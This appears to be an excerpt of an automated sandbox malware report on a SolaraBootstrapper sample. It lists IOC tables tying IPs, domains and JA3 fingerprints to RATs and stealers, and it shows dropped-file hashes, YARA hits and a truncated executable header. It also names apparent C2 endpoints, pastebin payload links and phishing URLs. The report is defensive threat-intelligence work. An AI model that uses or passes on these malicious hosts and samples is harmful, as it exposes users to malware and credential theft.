	Invoice-883973938.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
128.116.123.4	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse
	https://shrturl.net/pmf-gx3n	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
80.211.144.156	eRZQCpMb4y.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	292192cl.nyashtop.top/providerimagePollsecureupdateWordpressdatalifePrivateTemporary.php
	4BJoBHQ6T3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	696969cm.n9shka.top/vm_httpUpdateAuthsqlWp.php
	oG6R4bo1Rd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	380681cm.n9shka.top/PipejavascriptlowGameapibigloadFlowertempCentraltemporary.php
	kIdT4m0aa4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	304550cm.n9shka.top/jspollgamesqldle.php
	7buiOqC9uM.exe	Get hash	malicious	DCRat	Browse	545735cm.n9shteam2.top/PhpgeoupdateprocessorsqlTemporary.php
	5R28W1PAnS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	917166cm.n9shka.top/eternalJavascriptSecureCpuBigloadserverDefaultlinuxwordpress.php
	YhyZwI1Upd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	gugol.top/PipeCpuauthgameDefault.php
	6KZExx4zr6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	moscowteslaclub.top/LinemultiLinux.php
	U22myB552e.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	692143cm.n9shka.top/VideoPythonphpsecureprocessorwindowsDleTemporary.php
	active key.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.nodejs.org	RHUENHera1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	solarabootstrapper.exe	Get hash	malicious	XWorm	Browse	104.20.23.46
	3jF5V4T8LO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.20.22.46
getsolara.dev	RHUENHera1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.203.125
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	172.67.203.125
	SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	172.67.203.125
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
pastebin.com	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.20.3.235
	GKrKPXOkdF.zsb.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
	bdsBbxwPyV.ena.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
	fblXRRCHON.pos.dll	Get hash	malicious	Unknown	Browse	104.20.4.235
	GmsiIZXruf.hos.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
	file.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	file.exe	Get hash	malicious	DarkTortilla, PureLog Stealer	Browse	104.20.4.235
	file.exe	Get hash	malicious	DarkTortilla	Browse	104.20.3.235
	file.exe	Get hash	malicious	MicroClip, RedLine	Browse	104.20.3.235
	RHUENHera1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.4.235
edge-term4-fra2.roblox.com	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	128.116.123.4
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SolaraBootstrapper.exe	Get hash	malicious	DCRat, XWorm	Browse	128.116.123.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROBLOX-PRODUCTIONUS	RHUENHera1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	128.116.21.3
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	https://roblox.tz/games/10449761463/BOSS-The-Strongest-Battlegrounds?privateServerLinkCode=11856892146830167735895077236647	Get hash	malicious	Unknown	Browse	128.116.44.4
	SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exe	Get hash	malicious	Unknown	Browse	128.116.44.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	128.116.123.4
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	128.116.21.4
	https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445	Get hash	malicious	Unknown	Browse	128.116.119.4
	https://shrturl.net/pmf-gx3n	Get hash	malicious	Unknown	Browse	128.116.123.4
	cheat_roblox.exe	Get hash	malicious	XWorm	Browse	128.116.21.4
ARUBA-ASNIT	http://fotoclubsanmartino.it	Get hash	malicious	Unknown	Browse	62.149.128.45
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.221
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.221
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.221
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.221
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	80.88.87.245
	eRZQCpMb4y.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	4BJoBHQ6T3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	80.211.144.156
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.245
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	80.88.87.245
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.21.85.189
	sntmr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	setup3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, SmokeLoader	Browse	172.67.136.135
	vfdjg.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	https://os50-card.ru/50	Get hash	malicious	Unknown	Browse	104.17.25.14
	66e40b2e8a52e_lfsdj.exe	Get hash	malicious	LummaC	Browse	104.21.38.33
	app__v6.20.5_.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	WorldWars Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.21.85.189
	sntmr.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	setup3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, SmokeLoader	Browse	172.67.136.135
	vfdjg.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.136.135
	https://os50-card.ru/50	Get hash	malicious	Unknown	Browse	104.17.25.14
	66e40b2e8a52e_lfsdj.exe	Get hash	malicious	LummaC	Browse	104.21.38.33
	app__v6.20.5_.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	WorldWars Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	final_payload.bin.exe	Get hash	malicious	XWorm	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	https://os50-card.ru/50	Get hash	malicious	Unknown	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	WIN CHANGER 2.3.exe	Get hash	malicious	XWorm	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%7A%6F%71%7A%71%2E%6F%72%67%2F%61%74%74%2F%61%74%74%2FLZH2gvcseOdSTVo1rdoVRIuO/amZhbGNrZUBraWxjb3lnbG9iYWxmb29kcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	PO#005.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	https://procoinbaselogin.iwopop.com/	Get hash	malicious	Unknown	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	http://hamouda0-t3-zabi.blogspot.com.es/	Get hash	malicious	Unknown	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46
	http://metasamsk-uswallt.gitbook.io/	Get hash	malicious	Unknown	Browse	172.67.203.125 104.20.3.235 128.116.123.4 104.20.23.46

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (460), with no line terminators
Category:	dropped
Size (bytes):	460
Entropy (8bit):	5.8264948274813815
Encrypted:	false
SSDEEP:	12:kJ5xHQlYS7GLpLofSl3/9+MMUnH+174E8hFsK:k3xzDLFof6MMM3UE8hv
MD5:	74D227E3D912A57BD18DE1D618C892EE
SHA1:	D98F42681813DAE3010EC5F2BAB4FF934C9F8104
SHA-256:	AC8A0000205896849C8063E7ED9A36181B6BDE0136DDEBC822460AD1A785279F
SHA-512:	827940779E797D7A9A58583FF09DF78CD6D09017290A9D21815881F260A2025C221903F6635F0DD5C1FF700847EC7E81EFE1B26784A393A3FB479C762365E9CC
Malicious:	false
Preview:	9p1uFlWERuikSqeDF4Dg1djduIdwuHMbzQwFqQ9YkuY2CjN81CaYIikfGY96HjTJhGuC3ZXy4p6GFrbL5f5rqySRpQ8RQDQAaOU5yKEcomedleaZ7yBmomctydXmaGi1Y5p0XfWuacCEUzpK0jTbBoWywkHVxbBiDnEqykCbcRLLjXZ8xMw1wGzui0DwYB68beBqv9WPh19udLPZLIhlpKw7xUH7gPDaUMuFWsNy0gT4GFRXlolPdUTQrD2b1YtRyiZQbKDc5svI010sCuW2oy792dXSzw7bxBGhpA5blJTvjLa0MKYHC1n9lZX8wumJvTUzvTDCy4QfeMarCgFpX0Z6XG5Qm7o0gKAQ0lF3HVSHkIfZ9q5Pp7v43XboXwZ0QZ8TLK0bbLiBhSWPkgR6CYLjYFWcKagU6c1KJLNyzdydYtXkBLD1fdy1OZ5GxXRApNFEbLFZScGi

C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\2036bbf9130283

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (943), with no line terminators
Category:	dropped
Size (bytes):	943
Entropy (8bit):	5.9146581571923695
Encrypted:	false
SSDEEP:	24:JkIdkR6gDhOirUj7fOvjVTcjxiK4PchfwVqfl+MP:i4oOirc7fObVojF40hfuI9P
MD5:	B5B6B7412814E048B8FA1B3BEB408C0E
SHA1:	5DA711044B81651743CC2534399390A8DEDD6D7C
SHA-256:	1EEB46B9B64C51B5E93CD36178BD9DBC3DCB9795BEE78B486B7AC9F1E96E47D1
SHA-512:	07D90A8E4A63E403843438ACDDC2E2683B102385F4DBC7266A55ADA5590EE22865B3313EF105BC5A8D31E90A156B9B8756630AEA174947785FA7B310403601F1
Malicious:	false
Preview:	yIG0H1Oa6Iuv5tDwLjjgBn11I3vrbBNZHb6PyEmrRGF2i5ropmx2oM4KQPsNFg955Voexx7G72O5i8SMLHCyNVv4gv8jWYlvGJ7NRN11pr4v89mS7fB8eKrjkt7ByYtiQdzYAF58PKJga96hIql1WnQ5cXmhP0CQ7WffKOR2jDtTALIkxa2Iw2LnM36mcYsYH3iEdaX4YtRS464QPCtz74eFK2SQSpZLVULHnEGWD8tDk2sP8pXao3bNYd3lIGltTG7kvxnK5Xv9KbfSJCSmR9hc28sKLfO7WAtd5IeLCMeQHbC77kbFy8bTjfrwEc9ZJymKrBXBiGkEeQUa5uMkDIIXiZ4ZbrGjNFHTz2Q6NagrYXzSKQ1TQZVApOlSG7k1AA1ZJBlDePWnmb9LkmOK0xTytGnkQ70P0prXgZIJpyyACsYOPasesZBMrDpCXAwgZHx6uloKdFfB8SvBsZV0PWgaoeqduGvoBRl54cenvhAn49OYRoU8p5RDkXSP5LaXT19qr0HQ5rFsV3goQRLFvw8GAiUhJOsjHnTD9hrbhED70jrq1n9n9Ulh23pIfjGq9fkskdptjuirsBPb0oqgPEjwCwKF1j578X8V89GY7PEPv3y1nOR13jb45yqySj1AyltVC4d1hRi9AUBI7TcmREDY5DaKTSFYYDaKKcytvaTlBb4kxh09HOsuhUa8eTiPMKl6407fes11ubXdJzXvbGQJUpm0CzPc1DZ007q6kUeYW19G66zo5xxF3bmOOGdodZ9rCgnMJaKHl2wdqg3GAkgEQT7ZVbrd1z572SDaSmffmqeBoIisNWo234asiN1rsrPv6zlXccxXFBcjz6uM39PeLDD71V1Fvxw4bsEzhKPujQx2c12mdpytbuk2vngHlsmROhIH15ottf55QLeAcPlG9CcqIMD3oIJ1ofn4svuhAF9

C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.535182328864218
Encrypted:	false
SSDEEP:	24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
MD5:	3C3B7D5864E9F151A77B33D4B9D15E3C
SHA1:	D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
SHA-256:	DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
SHA-512:	5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.1_acfe46f69353e7873b32e3e17f3d3a8ab076eb_d2093ef2_f18a3c45-9587-46c0-b8f2-b7c436a166cc\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2326161723389917
Encrypted:	false
SSDEEP:	192:375PnNFsGYr0bU9+dQdaWBkl8vAEZizuiFJZ24lO8k:9vsGnbG+dQdamqehZizuiFJY4lO8k
MD5:	EE4584F4EB4282D80AB3CEA91C75D8E3
SHA1:	24161A8E61F1F3A714BC2F8925BC1139BD09C01C
SHA-256:	AE2CB1FCA39207C25AF7F8C9264E752D28B680A3F1C8A238139A1F36D54FD3FF
SHA-512:	11C552136535CC12844649F8D39D5AE72848B6E2168CFB2B69AA331D9E0EF58BDE65D1B271DEC7FE13D0F0E6F8B36EF121EE8187C393E106FE67FECBAF6774A8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.7.8.4.7.3.3.0.2.5.1.4.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.7.8.4.7.3.5.3.3.7.6.3.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.a.3.c.4.5.-.9.5.8.7.-.4.6.c.0.-.b.8.f.2.-.b.7.c.4.3.6.a.1.6.6.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.5.8.8.1.c.e.-.6.2.a.a.-.4.e.4.7.-.b.e.6.6.-.2.5.3.b.9.b.b.b.f.e.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...1.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.0.-.0.0.0.1.-.0.0.1.4.-.5.d.2.f.-.f.d.2.0.9.4.0.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.e.2.7.e.f.f.4.c.d.4.d.3.8.3.f.5.c.5.6.4.c.c.e.2.b.d.1.a.a.a.2.f.f.e.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5022.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Sat Sep 14 10:52:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	601300
Entropy (8bit):	3.159398610180954
Encrypted:	false
SSDEEP:	3072:CjmUUsPJLp3+vFKENg6oVmfyBOXpIymdSZb8bE2AvaU4sCDYGaPPPCjcSAsO6wRJ:CjmUUsPFp3QwCgdbE2kHvjXq3XsqqTb
MD5:	226A3818227C7393C947767ED14312C7
SHA1:	47A5CB55C26FB4500FDA9CBC5E1836A21D5BD95D
SHA-256:	597DB8B7BFF87AD95699EE4CE8509378C3A0F3F8088E9246215DCA05179F1D5A
SHA-512:	4260B3B59E547CD69CF1E60009F4F73F378D9E13DCC1363217835068643BB845C0F424954586F4C480DF0A7E9DCC8764E20BE2F216FF34E7F9329E81D9A79B9D
Malicious:	false
Preview:	MDMP..a..... ........j.f............d...........d...........<....(....... ..$).......X.............l.......8...........T............U...............I...........K..............................................................................eJ......0L......Lw......................T............j.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER57E4.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6816
Entropy (8bit):	3.7230816658623818
Encrypted:	false
SSDEEP:	192:R6l7wVeJMPoUSj1YZj8Qpr489boPkfYAYm:R6lXJEZSxYtjocfV
MD5:	9D29F85C7377A73ED3501EC015D41936
SHA1:	2466B15824970C8209B67AA957626A03329694BC
SHA-256:	EFD5153BBDFAC170351F7E7A8873A4FB866D7F4D3987D0B984DE879C3E930C69
SHA-512:	29806D0F875A5A99F37875EE9609EA087462A682C9814F4A8E48D2E935F327E937D628F70BA52CAFF23BE86B4E356B6D27E7CDDCC31702B0B825150C2E797B8D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5862.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4834
Entropy (8bit):	4.467367541101133
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I9SFWpW8VYOYm8M4JM/F9yq8vyXdew0Ud:uIjf6I7F07VGJ+WSeFUd
MD5:	C59DA08570D6CE16E91132CCDC30D7A1
SHA1:	CF19C1631C513405AD2398AE825B7551DC661DE3
SHA-256:	30B6E480DC5C892771974195CA81AD37F575B4091B44EFCCF80033A1BF4507C1
SHA-512:	7D74428F706F0A6051C1C2EACBC050F3B70351F4EC72CA10B5C8AF4A1828A4981DB31ABD855D1FF40AE976BB3925C86CC6853C30836AFA3C20A535DF41D5933A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="499794" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Recovery\2036bbf9130283

Download File

Process:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
File Type:	ASCII text, with very long lines (459), with no line terminators
Category:	dropped
Size (bytes):	459
Entropy (8bit):	5.855347794279777
Encrypted:	false
SSDEEP:	12:bdaPr5ORFQ4vkcxUch3tLaDQGWSLHnuirKL/4WbR1RoJKcEA:bMdORFQ4vphJIQ5Sjn/KR1RHcEA
MD5:	F833CEFD21034CE83EABE9CB82330470
SHA1:	E45F1F48B6AE610AC10F77B3970CA722B46756C1
SHA-256:	6D3582828EF717F66080BD344E0D39316C95A36BD510671103DC50A24BF7C01F
SHA-512:	3D452DB6886986A180EC2BE63D973CA52B4E173339E45111E12223A082C96FD27C6DF3A0BEA044EC4AFE38969781C8B651B4B026A36824CB1657DACD1901D129
Malicious:	false
